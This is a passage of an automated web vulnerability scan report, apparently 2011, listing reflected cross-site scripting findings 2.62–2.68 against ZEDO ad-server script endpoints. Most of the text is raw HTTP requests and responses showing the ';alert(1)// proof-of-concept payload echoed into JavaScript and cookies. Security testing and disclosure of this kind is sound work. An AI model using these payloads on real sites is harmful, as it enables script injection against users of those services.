var zzStr="q=,ac370';alert(1)//316d65e6609;z="+Math.random();}

if(zzuid=='unknown')zzuid='5ajh4goBADQAAFjiiCYAAABN~042311';

var zzhasA
...[SNIP]...

2.62. http://d7.zedo.com/bar/v16-406/d3/jsc/fm.js [$ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-406/d3/jsc/fm.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 87099"%3balert(1)//5fff92f106d was submitted in the $ parameter. This input was echoed as 87099";alert(1)//5fff92f106d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-406/d3/jsc/fm.js?c=2/1&a=0&f=&n=1099&r=13&d=9&q=&$=87099"%3balert(1)//5fff92f106d&s=1&l=http%3A//ad.doubleclick.net/click%253Bh%253Dv8/3b02/f/180/%252a/k%253B230856172%253B0-0%253B0%253B54838158%253B4307-300/250%253B38780865/38798622/1%253B%253B%257Eaopt%253D6/0/ff/1%253B%257Esscs%253D%253fhttp%3A//adclick.g.doubleclick.net/aclk%253Fsa%253DL%2526ai%253DBqcIQ3QnITYHLMdHzlAfkkdilD9mI4PMBAAAAEAEgjfDlBTgAWMG1jcYbYMmGhYmIpIQQsgERd3d3LmNzbW9uaXRvci5jb226AQozMDB4MjUwX2FzyAEJ2gEhaHR0cDovL3d3dy5jc21vbml0b3IuY29tL0J1c2luZXNz4AEEmAKIJ8ACAuACAOoCDjMwMHgyNTBBX01vbmV5-ALw0R6QA6QDmAPgA6gDAeAEAQ%2526num%253D0%2526sig%253DAGiWqtzUGb2mvqDPCSfB7Czyb06Trd9-Zg%2526client%253Dca-pub-6743622525202572%2526adurl%253Dhttp%253a%252f%252fwww.csmonitor.com/&z=0.16775888670235872 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.csmonitor.com/Business
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDX=29; ZEDOIDA=5ajh4goBADQAAFjiiCYAAABN~042311; FFCap=1581B1219,212244|0,1,1; __qca=P0-591305981-1304358415303; PI=h749620Za805982Zc305002744%2C305002744Zs263Zt1122; FFAbh=847B162,20|313_1#365; ZFFAbh=845B826,20|1451_856#376Z1117_846#366Z798_845#365; FFgeo=2241452; FFChanCap=1573B496,121#543485#876543#675101:1219,16#736039,18#736041|0,15,1:1,15,1:5,15,1:0,9,1:0,9,1

Response (redirected)

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1099:87099";alert(1)//5fff92f106d;expires=Tue, 10 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1099,2,9;expires=Tue, 10 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0;expires=Tue, 10 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "ae1b52-8181-4a207a1458040"
Vary: Accept-Encoding
X-Varnish: 1332201874 1332193309
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=158
Expires: Mon, 09 May 2011 15:38:49 GMT
Date: Mon, 09 May 2011 15:36:11 GMT
Connection: close
Content-Length: 2013

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat=',87099";alert(1)//5fff92f106d';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=,87099";alert(1)//5fff92f106d;z="+Math.random();}

if(zzuid=='unknown')zzuid='5ajh4goBADQAAFjiiCYAAABN~042311';

var zzhasAd=undefined;


                                                                                                       var zzStr
...[SNIP]...

2.63. http://d7.zedo.com/bar/v16-406/d3/jsc/fm.js [q parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-406/d3/jsc/fm.js

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c084f'%3balert(1)//aea7f71949f was submitted in the q parameter. This input was echoed as c084f';alert(1)//aea7f71949f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-406/d3/jsc/fm.js?c=2/1&a=0&f=&n=1099&r=13&d=9&q=c084f'%3balert(1)//aea7f71949f&$=&s=1&l=http%3A//ad.doubleclick.net/click%253Bh%253Dv8/3b02/f/180/%252a/k%253B230856172%253B0-0%253B0%253B54838158%253B4307-300/250%253B38780865/38798622/1%253B%253B%257Eaopt%253D6/0/ff/1%253B%257Esscs%253D%253fhttp%3A//adclick.g.doubleclick.net/aclk%253Fsa%253DL%2526ai%253DBqcIQ3QnITYHLMdHzlAfkkdilD9mI4PMBAAAAEAEgjfDlBTgAWMG1jcYbYMmGhYmIpIQQsgERd3d3LmNzbW9uaXRvci5jb226AQozMDB4MjUwX2FzyAEJ2gEhaHR0cDovL3d3dy5jc21vbml0b3IuY29tL0J1c2luZXNz4AEEmAKIJ8ACAuACAOoCDjMwMHgyNTBBX01vbmV5-ALw0R6QA6QDmAPgA6gDAeAEAQ%2526num%253D0%2526sig%253DAGiWqtzUGb2mvqDPCSfB7Czyb06Trd9-Zg%2526client%253Dca-pub-6743622525202572%2526adurl%253Dhttp%253a%252f%252fwww.csmonitor.com/&z=0.16775888670235872 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.csmonitor.com/Business
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDX=29; ZEDOIDA=5ajh4goBADQAAFjiiCYAAABN~042311; FFCap=1581B1219,212244|0,1,1; __qca=P0-591305981-1304358415303; PI=h749620Za805982Zc305002744%2C305002744Zs263Zt1122; FFAbh=847B162,20|313_1#365; ZFFAbh=845B826,20|1451_856#376Z1117_846#366Z798_845#365; FFgeo=2241452; FFChanCap=1573B496,121#543485#876543#675101:1219,16#736039,18#736041|0,15,1:1,15,1:5,15,1:0,9,1:0,9,1

Response (redirected)

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=0;expires=Tue, 10 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1099,2,9;expires=Tue, 10 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "ae1b52-8181-4a207a1458040"
Vary: Accept-Encoding
X-Varnish: 1332201874 1332193309
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=158
Expires: Mon, 09 May 2011 15:38:49 GMT
Date: Mon, 09 May 2011 15:36:11 GMT
Connection: close
Content-Length: 2010

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat='c084f';alert(1)//aea7f71949f';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=c084f';alert(1)//aea7f71949f;z="+Math.random();}

if(zzuid=='unknown')zzuid='5ajh4goBADQAAFjiiCYAAABN~042311';

var zzhasAd
...[SNIP]...

2.64. http://d7.zedo.com/bar/v16-406/d3/jsc/fm.js [q parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-406/d3/jsc/fm.js

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4bc88"%3balert(1)//bd966777450 was submitted in the q parameter. This input was echoed as 4bc88";alert(1)//bd966777450 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-406/d3/jsc/fm.js?c=2/1&a=0&f=&n=1099&r=13&d=9&q=4bc88"%3balert(1)//bd966777450&$=&s=1&l=http%3A//ad.doubleclick.net/click%253Bh%253Dv8/3b02/f/180/%252a/k%253B230856172%253B0-0%253B0%253B54838158%253B4307-300/250%253B38780865/38798622/1%253B%253B%257Eaopt%253D6/0/ff/1%253B%257Esscs%253D%253fhttp%3A//adclick.g.doubleclick.net/aclk%253Fsa%253DL%2526ai%253DBqcIQ3QnITYHLMdHzlAfkkdilD9mI4PMBAAAAEAEgjfDlBTgAWMG1jcYbYMmGhYmIpIQQsgERd3d3LmNzbW9uaXRvci5jb226AQozMDB4MjUwX2FzyAEJ2gEhaHR0cDovL3d3dy5jc21vbml0b3IuY29tL0J1c2luZXNz4AEEmAKIJ8ACAuACAOoCDjMwMHgyNTBBX01vbmV5-ALw0R6QA6QDmAPgA6gDAeAEAQ%2526num%253D0%2526sig%253DAGiWqtzUGb2mvqDPCSfB7Czyb06Trd9-Zg%2526client%253Dca-pub-6743622525202572%2526adurl%253Dhttp%253a%252f%252fwww.csmonitor.com/&z=0.16775888670235872 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.csmonitor.com/Business
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDX=29; ZEDOIDA=5ajh4goBADQAAFjiiCYAAABN~042311; FFCap=1581B1219,212244|0,1,1; __qca=P0-591305981-1304358415303; PI=h749620Za805982Zc305002744%2C305002744Zs263Zt1122; FFAbh=847B162,20|313_1#365; ZFFAbh=845B826,20|1451_856#376Z1117_846#366Z798_845#365; FFgeo=2241452; FFChanCap=1573B496,121#543485#876543#675101:1219,16#736039,18#736041|0,15,1:1,15,1:5,15,1:0,9,1:0,9,1

Response (redirected)

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=0;expires=Tue, 10 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1099,2,9;expires=Tue, 10 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "ae1b52-8181-4a207a1458040"
Vary: Accept-Encoding
X-Varnish: 1332201874 1332193309
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=159
Expires: Mon, 09 May 2011 15:38:49 GMT
Date: Mon, 09 May 2011 15:36:10 GMT
Connection: close
Content-Length: 2010

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat='4bc88";alert(1)//bd966777450';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=4bc88";alert(1)//bd966777450;z="+Math.random();}

if(zzuid=='unknown')zzuid='5ajh4goBADQAAFjiiCYAAABN~042311';

var zzhasAd=undefined;


                                                                                                       var zzStr
...[SNIP]...

2.65. http://d7.zedo.com/bar/v16-406/d3/jsc/fmr.js [$ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-406/d3/jsc/fmr.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c5170'%3balert(1)//90fb171ccd1 was submitted in the $ parameter. This input was echoed as c5170';alert(1)//90fb171ccd1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-406/d3/jsc/fmr.js?c=2/1&a=0&f=&n=1099&r=13&d=9&q=&$=c5170'%3balert(1)//90fb171ccd1&s=1&l=http%3A//ad.doubleclick.net/click%253Bh%253Dv8/3b02/f/180/%252a/k%253B230856172%253B0-0%253B0%253B54838158%253B4307-300/250%253B38780865/38798622/1%253B%253B%257Eaopt%253D6/0/ff/1%253B%257Esscs%253D%253fhttp%3A//adclick.g.doubleclick.net/aclk%253Fsa%253DL%2526ai%253DBqcIQ3QnITYHLMdHzlAfkkdilD9mI4PMBAAAAEAEgjfDlBTgAWMG1jcYbYMmGhYmIpIQQsgERd3d3LmNzbW9uaXRvci5jb226AQozMDB4MjUwX2FzyAEJ2gEhaHR0cDovL3d3dy5jc21vbml0b3IuY29tL0J1c2luZXNz4AEEmAKIJ8ACAuACAOoCDjMwMHgyNTBBX01vbmV5-ALw0R6QA6QDmAPgA6gDAeAEAQ%2526num%253D0%2526sig%253DAGiWqtzUGb2mvqDPCSfB7Czyb06Trd9-Zg%2526client%253Dca-pub-6743622525202572%2526adurl%253Dhttp%253a%252f%252fwww.csmonitor.com/&z=0.16775888670235872 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.csmonitor.com/Business
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDX=29; ZEDOIDA=5ajh4goBADQAAFjiiCYAAABN~042311; FFCap=1581B1219,212244|0,1,1; __qca=P0-591305981-1304358415303; PI=h749620Za805982Zc305002744%2C305002744Zs263Zt1122; FFAbh=847B162,20|313_1#365; ZFFAbh=845B826,20|1451_856#376Z1117_846#366Z798_845#365; FFgeo=2241452; FFChanCap=1573B496,121#543485#876543#675101:1219,16#736039,18#736041|0,15,1:1,15,1:5,15,1:0,9,1:0,9,1; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1099:c5170';alert(1)//90fb171ccd1;expires=Tue, 10 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1099,2,9;expires=Tue, 10 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0;expires=Tue, 10 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFChanCap=1573B496,121#543485#876543#675101:1219,16#736039,18#736041:1099,2#702968|0,15,1:1,15,1:5,15,1:0,9,1:0,9,1:0,17,1;expires=Wed, 08 Jun 2011 15:36:10 GMT;path=/;domain=.zedo.com;
ETag: "ae1b52-8181-4a207a1458040"
Vary: Accept-Encoding
X-Varnish: 1332201874 1332193309
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=159
Expires: Mon, 09 May 2011 15:38:49 GMT
Date: Mon, 09 May 2011 15:36:10 GMT
Connection: close
Content-Length: 2055

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat=',c5170';alert(1)//90fb171ccd1';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=,c5170';alert(1)//90fb171ccd1;z="+Math.random();}

if(zzuid=='unknown')zzuid='5ajh4goBADQAAFjiiCYAAABN~042311';

var zzhasA
...[SNIP]...

2.66. http://d7.zedo.com/bar/v16-406/d3/jsc/fmr.js [$ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-406/d3/jsc/fmr.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 37620"%3balert(1)//694f98afb55 was submitted in the $ parameter. This input was echoed as 37620";alert(1)//694f98afb55 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-406/d3/jsc/fmr.js?c=2/1&a=0&f=&n=1099&r=13&d=9&q=&$=37620"%3balert(1)//694f98afb55&s=1&l=http%3A//ad.doubleclick.net/click%253Bh%253Dv8/3b02/f/180/%252a/k%253B230856172%253B0-0%253B0%253B54838158%253B4307-300/250%253B38780865/38798622/1%253B%253B%257Eaopt%253D6/0/ff/1%253B%257Esscs%253D%253fhttp%3A//adclick.g.doubleclick.net/aclk%253Fsa%253DL%2526ai%253DBqcIQ3QnITYHLMdHzlAfkkdilD9mI4PMBAAAAEAEgjfDlBTgAWMG1jcYbYMmGhYmIpIQQsgERd3d3LmNzbW9uaXRvci5jb226AQozMDB4MjUwX2FzyAEJ2gEhaHR0cDovL3d3dy5jc21vbml0b3IuY29tL0J1c2luZXNz4AEEmAKIJ8ACAuACAOoCDjMwMHgyNTBBX01vbmV5-ALw0R6QA6QDmAPgA6gDAeAEAQ%2526num%253D0%2526sig%253DAGiWqtzUGb2mvqDPCSfB7Czyb06Trd9-Zg%2526client%253Dca-pub-6743622525202572%2526adurl%253Dhttp%253a%252f%252fwww.csmonitor.com/&z=0.16775888670235872 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.csmonitor.com/Business
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDX=29; ZEDOIDA=5ajh4goBADQAAFjiiCYAAABN~042311; FFCap=1581B1219,212244|0,1,1; __qca=P0-591305981-1304358415303; PI=h749620Za805982Zc305002744%2C305002744Zs263Zt1122; FFAbh=847B162,20|313_1#365; ZFFAbh=845B826,20|1451_856#376Z1117_846#366Z798_845#365; FFgeo=2241452; FFChanCap=1573B496,121#543485#876543#675101:1219,16#736039,18#736041|0,15,1:1,15,1:5,15,1:0,9,1:0,9,1; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1099:37620";alert(1)//694f98afb55;expires=Tue, 10 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1099,2,9;expires=Tue, 10 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0;expires=Tue, 10 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFChanCap=1573B496,121#543485#876543#675101:1219,16#736039,18#736041:1099,2#702968|0,15,1:1,15,1:5,15,1:0,9,1:0,9,1:0,17,1;expires=Wed, 08 Jun 2011 15:36:10 GMT;path=/;domain=.zedo.com;
ETag: "ae1b52-8181-4a207a1458040"
Vary: Accept-Encoding
X-Varnish: 1332201874 1332193309
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=159
Expires: Mon, 09 May 2011 15:38:49 GMT
Date: Mon, 09 May 2011 15:36:10 GMT
Connection: close
Content-Length: 2055

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat=',37620";alert(1)//694f98afb55';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=,37620";alert(1)//694f98afb55;z="+Math.random();}

if(zzuid=='unknown')zzuid='5ajh4goBADQAAFjiiCYAAABN~042311';

var zzhasAd=undefined;


                           var zzStr = "s=1;u=5ajh4goBADQAAFjiiCYAAABN~042311;z=
...[SNIP]...

2.67. http://d7.zedo.com/bar/v16-406/d3/jsc/fmr.js [q parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-406/d3/jsc/fmr.js

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9688d'%3balert(1)//fc22f686ec7 was submitted in the q parameter. This input was echoed as 9688d';alert(1)//fc22f686ec7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-406/d3/jsc/fmr.js?c=2/1&a=0&f=&n=1099&r=13&d=9&q=9688d'%3balert(1)//fc22f686ec7&$=&s=1&l=http%3A//ad.doubleclick.net/click%253Bh%253Dv8/3b02/f/180/%252a/k%253B230856172%253B0-0%253B0%253B54838158%253B4307-300/250%253B38780865/38798622/1%253B%253B%257Eaopt%253D6/0/ff/1%253B%257Esscs%253D%253fhttp%3A//adclick.g.doubleclick.net/aclk%253Fsa%253DL%2526ai%253DBqcIQ3QnITYHLMdHzlAfkkdilD9mI4PMBAAAAEAEgjfDlBTgAWMG1jcYbYMmGhYmIpIQQsgERd3d3LmNzbW9uaXRvci5jb226AQozMDB4MjUwX2FzyAEJ2gEhaHR0cDovL3d3dy5jc21vbml0b3IuY29tL0J1c2luZXNz4AEEmAKIJ8ACAuACAOoCDjMwMHgyNTBBX01vbmV5-ALw0R6QA6QDmAPgA6gDAeAEAQ%2526num%253D0%2526sig%253DAGiWqtzUGb2mvqDPCSfB7Czyb06Trd9-Zg%2526client%253Dca-pub-6743622525202572%2526adurl%253Dhttp%253a%252f%252fwww.csmonitor.com/&z=0.16775888670235872 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.csmonitor.com/Business
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDX=29; ZEDOIDA=5ajh4goBADQAAFjiiCYAAABN~042311; FFCap=1581B1219,212244|0,1,1; __qca=P0-591305981-1304358415303; PI=h749620Za805982Zc305002744%2C305002744Zs263Zt1122; FFAbh=847B162,20|313_1#365; ZFFAbh=845B826,20|1451_856#376Z1117_846#366Z798_845#365; FFgeo=2241452; FFChanCap=1573B496,121#543485#876543#675101:1219,16#736039,18#736041|0,15,1:1,15,1:5,15,1:0,9,1:0,9,1; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFChanCap=1573B496,121#543485#876543#675101:1219,16#736039,18#736041:1099,2#702968|0,15,1:1,15,1:5,15,1:0,9,1:0,9,1:0,17,1;expires=Wed, 08 Jun 2011 15:36:10 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=1099,2,9;expires=Tue, 10 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0;expires=Tue, 10 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "ae1b52-8181-4a207a1458040"
Vary: Accept-Encoding
X-Varnish: 1332201874 1332193309
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=159
Expires: Mon, 09 May 2011 15:38:49 GMT
Date: Mon, 09 May 2011 15:36:10 GMT
Connection: close
Content-Length: 2052

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat='9688d';alert(1)//fc22f686ec7';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=9688d';alert(1)//fc22f686ec7;z="+Math.random();}

if(zzuid=='unknown')zzuid='5ajh4goBADQAAFjiiCYAAABN~042311';

var zzhasAd
...[SNIP]...

2.68. http://d7.zedo.com/bar/v16-406/d3/jsc/fmr.js [q parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-406/d3/jsc/fmr.js

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c34aa"%3balert(1)//d137eb38567 was submitted in the q parameter. This input was echoed as c34aa";alert(1)//d137eb38567 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-406/d3/jsc/fmr.js?c=2/1&a=0&f=&n=1099&r=13&d=9&q=c34aa"%3balert(1)//d137eb38567&$=&s=1&l=http%3A//ad.doubleclick.net/click%253Bh%253Dv8/3b02/f/180/%252a/k%253B230856172%253B0-0%253B0%253B54838158%253B4307-300/250%253B38780865/38798622/1%253B%253B%257Eaopt%253D6/0/ff/1%253B%257Esscs%253D%253fhttp%3A//adclick.g.doubleclick.net/aclk%253Fsa%253DL%2526ai%253DBqcIQ3QnITYHLMdHzlAfkkdilD9mI4PMBAAAAEAEgjfDlBTgAWMG1jcYbYMmGhYmIpIQQsgERd3d3LmNzbW9uaXRvci5jb226AQozMDB4MjUwX2FzyAEJ2gEhaHR0cDovL3d3dy5jc21vbml0b3IuY29tL0J1c2luZXNz4AEEmAKIJ8ACAuACAOoCDjMwMHgyNTBBX01vbmV5-ALw0R6QA6QDmAPgA6gDAeAEAQ%2526num%253D0%2526sig%253DAGiWqtzUGb2mvqDPCSfB7Czyb06Trd9-Zg%2526client%253Dca-pub-6743622525202572%2526adurl%253Dhttp%253a%252f%252fwww.csmonitor.com/&z=0.16775888670235872 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.csmonitor.com/Business
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDX=29; ZEDOIDA=5ajh4goBADQAAFjiiCYAAABN~042311; FFCap=1581B1219,212244|0,1,1; __qca=P0-591305981-1304358415303; PI=h749620Za805982Zc305002744%2C305002744Zs263Zt1122; FFAbh=847B162,20|313_1#365; ZFFAbh=845B826,20|1451_856#376Z1117_846#366Z798_845#365; FFgeo=2241452; FFChanCap=1573B496,121#543485#876543#675101:1219,16#736039,18#736041|0,15,1:1,15,1:5,15,1:0,9,1:0,9,1; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFChanCap=1573B496,121#543485#876543#675101:1219,16#736039,18#736041:1099,2#702968|0,15,1:1,15,1:5,15,1:0,9,1:0,9,1:0,17,1;expires=Wed, 08 Jun 2011 15:36:10 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=1099,2,9;expires=Tue, 10 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0;expires=Tue, 10 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "ae1b52-8181-4a207a1458040"
Vary: Accept-Encoding
X-Varnish: 1332201874 1332193309
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=159
Expires: Mon, 09 May 2011 15:38:49 GMT
Date: Mon, 09 May 2011 15:36:10 GMT
Connection: close
Content-Length: 2052

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat='c34aa";alert(1)//d137eb38567';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=c34aa";alert(1)//d137eb38567;z="+Math.random();}

if(zzuid=='unknown')zzuid='5ajh4goBADQAAFjiiCYAAABN~042311';

var zzhasAd=undefined;


                           var zzStr = "s=1;u=5ajh4goBADQAAFjiiCYAAABN~042311;z=
